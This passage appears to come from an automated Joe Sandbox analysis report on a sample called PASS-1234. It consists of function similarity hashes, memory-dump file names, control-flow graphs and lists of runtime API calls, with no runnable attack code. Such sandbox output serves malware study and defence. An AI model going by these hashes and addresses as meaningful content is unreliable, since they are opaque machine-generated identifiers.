                                                                                          • API String ID:
                                                                                          • Opcode ID: 11a6147a2b6eb16571bd941547aed8d0a3d17ba8a81220b21fb8b0f93edbe60c
                                                                                          • Instruction ID: 3a582599d1807395f7babf11dbaf552b27726395edc5f82e285c1dc4cc0a3d97
                                                                                          • Opcode Fuzzy Hash: 11a6147a2b6eb16571bd941547aed8d0a3d17ba8a81220b21fb8b0f93edbe60c
                                                                                          • Instruction Fuzzy Hash: 38F1AC356087418FD724CF29C8816ABFBE6EFD8304F48886DE4D587751EAB9E804CB56
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 14bcaf41f546fe1621ac93fb517103cf4ed7d1b91089589c2b3ba2662aeb5e7e
                                                                                          • Instruction ID: 3864c05b37050dd4d168eabd52b6406dd05cbb13e1abfce99fa8169d34d114fa
                                                                                          • Opcode Fuzzy Hash: 14bcaf41f546fe1621ac93fb517103cf4ed7d1b91089589c2b3ba2662aeb5e7e
                                                                                          • Instruction Fuzzy Hash: 628123B25047148BC7249F28C892B77B3E1EF91364F1945ACE8C28B391E7B5ED45C3A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 106d85f53690e5de62b95866d3afb66346140ce146c1f96cd5c3447849a1ffce
                                                                                          • Instruction ID: cddf393345ecbca7c3a8c0f28000ac85f98afd566ce9ca03e4f61c2921c0baad
                                                                                          • Opcode Fuzzy Hash: 106d85f53690e5de62b95866d3afb66346140ce146c1f96cd5c3447849a1ffce
                                                                                          • Instruction Fuzzy Hash: 35B1A076914301EBE7219F24DC41F2BBBE1FB98354F144A6CF8A9A72B1D631DD188B42
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6407c76cfec44517bd2b048b60a99ac920e3ab9c163d589af4c67c8920426b5c
                                                                                          • Instruction ID: 8ff3266973c124ada9516ee5f854298e68ac688c795b2675d9b0776c6075ba6a
                                                                                          • Opcode Fuzzy Hash: 6407c76cfec44517bd2b048b60a99ac920e3ab9c163d589af4c67c8920426b5c
                                                                                          • Instruction Fuzzy Hash: A7C15BB29487418FC370CF28CC86BABB7E1FB85318F08496DD1D9C6242EB78A155CB46
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 14a42c31c88e947a7e53d098ce103c92c06e45c4a7e9d7363cc0afd14f4e556a
                                                                                          • Instruction ID: 6c3f16a24db5586c6266bce8c43dea75e3bef50599c9e392acc47c54ad9cd243
                                                                                          • Opcode Fuzzy Hash: 14a42c31c88e947a7e53d098ce103c92c06e45c4a7e9d7363cc0afd14f4e556a
                                                                                          • Instruction Fuzzy Hash: C8615A346083509BDB24DF1AC89167FB7E2EF96324F2486ACE8D7972A1D3B09C41C746
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37904256e9b21f25fadc7d3b536694287d1f0336b770904f1f6828d71ab70111
                                                                                          • Instruction ID: 659384115c936cb57f6333a11499454dbaf87e3cf5b144256b3eb3d9cf2729e1
                                                                                          • Opcode Fuzzy Hash: 37904256e9b21f25fadc7d3b536694287d1f0336b770904f1f6828d71ab70111
                                                                                          • Instruction Fuzzy Hash: 86611637B199814BD7148E3D4C52BAD6A835BE7330B3E83BEE9B58B3E5C6664C024350
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 954e9cfa8243ac8994a67a85225e8a5d15718ee0b325fb636917656b2dda4ba6
                                                                                          • Instruction ID: e7a0b008eb34e256b1152bf6928f20dea8f74691f0897bb1396bfed5db7223b6
                                                                                          • Opcode Fuzzy Hash: 954e9cfa8243ac8994a67a85225e8a5d15718ee0b325fb636917656b2dda4ba6
                                                                                          • Instruction Fuzzy Hash: 9E5159B16087948FE314DF29D49475BBBE1BB84318F044E2DE4E987391E779DA088B82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 59b6d3ee9788d6f61efa0a29f5d77d5435f41e5291fbb81436e5d924cc7c097a
                                                                                          • Instruction ID: b44e0080d0ea3fee4145115dbef81a1275a43bd192d03cb311b7400dde0da9ea
                                                                                          • Opcode Fuzzy Hash: 59b6d3ee9788d6f61efa0a29f5d77d5435f41e5291fbb81436e5d924cc7c097a
                                                                                          • Instruction Fuzzy Hash: D8510426649AD14BE3298E3C6CA03BA7AD34BE7230B2DC7FDE9F5873E1D55588058350
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 83fbe2dfe9b82f7bf99deeed87d40d9137f73e63286784943343ff0126dedb5f
                                                                                          • Instruction ID: aecb8673fa85114e67afddb438fc32a7964d5afdf71067c7663304e45021610b
                                                                                          • Opcode Fuzzy Hash: 83fbe2dfe9b82f7bf99deeed87d40d9137f73e63286784943343ff0126dedb5f
                                                                                          • Instruction Fuzzy Hash: 8241D1716093018BC338DF28C891BABB3E5EF85320F154A6DE4D98B391EB74D841CB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dac2e0f241ba53f0888c85f0a126d3e33baf8ad59d1cc6a345b2c427172b1e71
                                                                                          • Instruction ID: d0772f010e3cbba2d9e67d0d0a6156482261ac31cd02c7b184d250244b8b2e85
                                                                                          • Opcode Fuzzy Hash: dac2e0f241ba53f0888c85f0a126d3e33baf8ad59d1cc6a345b2c427172b1e71
                                                                                          • Instruction Fuzzy Hash: 983112756183118B871CDF2AC89107AF7E6EBC8311F09C67ED48A87288EB74D905C7D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 551bb94f547aae600e71c9dcb248d7b786b362f3d05f7092ea807d5d699c2cbb
                                                                                          • Instruction ID: 19048ec5212567769d2d782f011a25c7d3063564d3064e91baafdde2fddae690
                                                                                          • Opcode Fuzzy Hash: 551bb94f547aae600e71c9dcb248d7b786b362f3d05f7092ea807d5d699c2cbb
                                                                                          • Instruction Fuzzy Hash: 2731403D04AFC083878BAF70B3760502E903AC71382AE07D8C4908ABA39106A303D6D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4be9f49cfc03e6050abed05098368a46fec2070f4a8bf6621ce0e810aaff524d
                                                                                          • Instruction ID: fe6eba2b5c986987fb8e186c84d8dbb3adc33a3882fab3ca905611492ac3a7a1
                                                                                          • Opcode Fuzzy Hash: 4be9f49cfc03e6050abed05098368a46fec2070f4a8bf6621ce0e810aaff524d
                                                                                          • Instruction Fuzzy Hash: D2214B36C447478FDB26DE7DC8559C7BFB0E9473B074883A5C5618BBE6CB2186058B50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5d97ad9db85ca095ba46b73e36467059e781b3f8d2921af8badd1d21d0f18b38
                                                                                          • Instruction ID: 7a425c75da64bbb78a81ee4a624d50bcae565edb1126e65d5e803c5fd28b6a50
                                                                                          • Opcode Fuzzy Hash: 5d97ad9db85ca095ba46b73e36467059e781b3f8d2921af8badd1d21d0f18b38
                                                                                          • Instruction Fuzzy Hash: 4B21B73DA096964BDB22CE79D0846C1FB61AF1627835885BEC5B60F642C760D982CFE1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5fad0769b1de4e7df22687cdae7c011a4ca960512689f23b9e171828e1e0e527
                                                                                          • Instruction ID: a684a3abd23df36d50df4578fbff6423843c36cffdc2bdafc1a3c816611e298e
                                                                                          • Opcode Fuzzy Hash: 5fad0769b1de4e7df22687cdae7c011a4ca960512689f23b9e171828e1e0e527
                                                                                          • Instruction Fuzzy Hash: 37012C3A485FC18BC35B9F74A7754853FA0BA871743AD03C8C8918ABB2C616A343D684
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 48c6286c0fd786c5696bbffd32bbe49e703b4a4a47ebca009d40f2a9d1870d21
                                                                                          • Instruction ID: 715c964db4ad96a83d43228de9ba3d0514ce3e72d184b71ee604f1bbac5417a7
                                                                                          • Opcode Fuzzy Hash: 48c6286c0fd786c5696bbffd32bbe49e703b4a4a47ebca009d40f2a9d1870d21
                                                                                          • Instruction Fuzzy Hash: BDF0F62B7553160BA310DDFEECD197FB3D5EBC9618B1D4138FA81D7241E5EAE80181A0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                          • Instruction ID: a6405eaf63020978ba80bdecac0e462f2ce9b13b7906007362be7f9973ad3313
                                                                                          • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                          • Instruction Fuzzy Hash: C5E08C32D15628EBCB20CB89CA4099AB3ECEB49A00B5644A6B621E7100E270DE00C7D0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1677 6d395868-6d39587c 1678 6d3958ea-6d3958f2 1677->1678 1679 6d39587e-6d395883 1677->1679 1681 6d395939-6d395951 call 6d3959d9 1678->1681 1682 6d3958f4-6d3958f7 1678->1682 1679->1678 1680 6d395885-6d39588a 1679->1680 1680->1678 1683 6d39588c-6d39588f 1680->1683 1691 6d395954-6d39595b 1681->1691 1682->1681 1685 6d3958f9-6d395936 call 6d393183 * 4 1682->1685 1683->1678 1686 6d395891-6d395899 1683->1686 1685->1681 1689 6d39589b-6d39589e 1686->1689 1690 6d3958b3-6d3958bb 1686->1690 1689->1690 1693 6d3958a0-6d3958b2 call 6d393183 call 6d397797 1689->1693 1696 6d3958bd-6d3958c0 1690->1696 1697 6d3958d5-6d3958e9 call 6d393183 * 2 1690->1697 1694 6d39597a-6d39597e 1691->1694 1695 6d39595d-6d395961 1691->1695 1693->1690 1705 6d395980-6d395985 1694->1705 1706 6d395996-6d3959a2 1694->1706 1701 6d395963-6d395966 1695->1701 1702 6d395977 1695->1702 1696->1697 1703 6d3958c2-6d3958d4 call 6d393183 call 6d397895 1696->1703 1697->1678 1701->1702 1710 6d395968-6d395976 call 6d393183 * 2 1701->1710 1702->1694 1703->1697 1713 6d395993 1705->1713 1714 6d395987-6d39598a 1705->1714 1706->1691 1708 6d3959a4-6d3959af call 6d393183 1706->1708 1710->1702 1713->1706 1714->1713 1715 6d39598c-6d395992 call 6d393183 1714->1715 1715->1713
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 6D3958AC
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977B4
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977C6
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977D8
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977EA
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D3977FC
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D39780E
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D397820
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D397832
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D397844
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D397856
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D397868
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D39787A
                                                                                            • Part of subcall function 6D397797: _free.LIBCMT ref: 6D39788C
                                                                                          • _free.LIBCMT ref: 6D3958A1
                                                                                            • Part of subcall function 6D393183: HeapFree.KERNEL32(00000000,00000000,?,6D3923BC), ref: 6D393199
                                                                                            • Part of subcall function 6D393183: GetLastError.KERNEL32(?,?,6D3923BC), ref: 6D3931AB
                                                                                          • _free.LIBCMT ref: 6D3958C3
                                                                                          • _free.LIBCMT ref: 6D3958D8
                                                                                          • _free.LIBCMT ref: 6D3958E3
                                                                                          • _free.LIBCMT ref: 6D395905
                                                                                          • _free.LIBCMT ref: 6D395918
                                                                                          • _free.LIBCMT ref: 6D395926
                                                                                          • _free.LIBCMT ref: 6D395931
                                                                                          • _free.LIBCMT ref: 6D395969
                                                                                          • _free.LIBCMT ref: 6D395970
                                                                                          • _free.LIBCMT ref: 6D39598D
                                                                                          • _free.LIBCMT ref: 6D3959A5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID:
                                                                                          • API String ID: 161543041-0
                                                                                          • Opcode ID: 9749e0ba5c9d694186ecf24450497a8aec64d862ebaf33b4a3548cdbdb801233
                                                                                          • Instruction ID: 6dd9b6b4aa18a570cd040d7f2346fbfe23b1c46116ef95363afe27109bc625d9
                                                                                          • Opcode Fuzzy Hash: 9749e0ba5c9d694186ecf24450497a8aec64d862ebaf33b4a3548cdbdb801233
                                                                                          • Instruction Fuzzy Hash: 3D319371608302AFEB116A38D805B7673F5EF01365F11892AE1AADF160FF75E981C714

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1734 6d392a43-6d392a56 1735 6d392a58-6d392a61 call 6d393183 1734->1735 1736 6d392a62-6d392b0f call 6d393183 * 9 call 6d39286f call 6d3928da 1734->1736 1735->1736
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 27600d443cff6c09df0082e235022af0a30e69da0eb4b98af7b7fdca44549c9c
                                                                                          • Instruction ID: e81c83628662fad89f9a60504ed73efb5fae73897ca4848f0c3b0be4fb5570fe
                                                                                          • Opcode Fuzzy Hash: 27600d443cff6c09df0082e235022af0a30e69da0eb4b98af7b7fdca44549c9c
                                                                                          • Instruction Fuzzy Hash: A52198BAD08108BFCB41EF94C880DDD7BB9EF09244F45856AA65A9F120EB75DA44CBC4

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1761 bdc690-bdc6c9 call bb8f70 1764 bdc6d0-bdc6f8 1761->1764 1764->1764 1765 bdc6fa-bdc743 1764->1765 1766 bdc750-bdc76a 1765->1766 1766->1766 1767 bdc76c-bdc8a1 1766->1767 1768 bdc8b0-bdc8e3 1767->1768 1768->1768 1769 bdc8e5-bdc8f5 1768->1769 1770 bdc90b-bdc913 1769->1770 1771 bdc8f7-bdc8fe 1769->1771 1773 bdc92b-bdc938 1770->1773 1774 bdc915-bdc916 1770->1774 1772 bdc900-bdc909 1771->1772 1772->1770 1772->1772 1776 bdc95b-bdc967 1773->1776 1777 bdc93a-bdc941 1773->1777 1775 bdc920-bdc929 1774->1775 1775->1773 1775->1775 1779 bdc969-bdc96a 1776->1779 1780 bdc97b-bdc985 1776->1780 1778 bdc950-bdc959 1777->1778 1778->1776 1778->1778 1781 bdc970-bdc979 1779->1781 1782 bdc99b-bdc9c3 call bf00c0 1780->1782 1783 bdc987-bdc98b 1780->1783 1781->1780 1781->1781 1785 bdc990-bdc999 1783->1785 1785->1782 1785->1785
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1CHJ$<]$BkVU$TKzT$VPYY$XXG^$Z31]$_FYl$x
                                                                                          • API String ID: 0-4215879068
                                                                                          • Opcode ID: a5ab305e1d916021bca556b1b4b433be02a434a025c7ec72534bc3616dcb9974
                                                                                          • Instruction ID: 2360ef39e6f0823c6240f7a5ead9ce855095e45dc598c745b31fb0a60f8670b1
                                                                                          • Opcode Fuzzy Hash: a5ab305e1d916021bca556b1b4b433be02a434a025c7ec72534bc3616dcb9974
                                                                                          • Instruction Fuzzy Hash: 52718AB401D3C28BE7368F2584207EBFFE1AB92714F18499EC4D99B352DB39440ACB56

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1787 6d391020-6d391071 call 6d399cb0 call 6d390fe0 call 6d391467 1794 6d3910cd-6d3910d0 1787->1794 1795 6d391073-6d391085 1787->1795 1796 6d3910f0-6d3910f9 1794->1796 1797 6d3910d2-6d3910df call 6d391450 1794->1797 1795->1796 1798 6d391087-6d39109e 1795->1798 1803 6d3910e4-6d3910ed call 6d390fe0 1797->1803 1800 6d3910a0-6d3910ae call 6d3913f0 1798->1800 1801 6d3910b4 1798->1801 1810 6d3910b0 1800->1810 1811 6d3910c4-6d3910cb 1800->1811 1802 6d3910b7-6d3910bc 1801->1802 1802->1798 1805 6d3910be-6d3910c0 1802->1805 1803->1796 1805->1796 1808 6d3910c2 1805->1808 1808->1803 1812 6d3910fa-6d391103 1810->1812 1813 6d3910b2 1810->1813 1811->1803 1814 6d39113d-6d39114d call 6d391430 1812->1814 1815 6d391105-6d39110c 1812->1815 1813->1802 1820 6d39114f-6d39115e call 6d391450 1814->1820 1821 6d391161-6d39117d call 6d390fe0 call 6d391410 1814->1821 1815->1814 1817 6d39110e-6d39111d call 6d399b50 1815->1817 1823 6d39113a 1817->1823 1824 6d39111f-6d391137 1817->1824 1820->1821 1823->1814 1824->1823
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6D391057
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6D39105F
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6D3910E8
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6D391113
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6D391168
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: ca98ba234f525c5365173e5afb2ce11b4df05ee3bbccde9ee02dcdcbbb3d6553
                                                                                          • Instruction ID: 4abf53f205fa1ac067788e90e9c26cee274c854c1d0b589a62a35e2f4d9161c3
                                                                                          • Opcode Fuzzy Hash: ca98ba234f525c5365173e5afb2ce11b4df05ee3bbccde9ee02dcdcbbb3d6553
                                                                                          • Instruction Fuzzy Hash: A641D634904249AFCF00CF69C880A9E7BB9BF45358F00C165E914AF355E7339A15CF91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
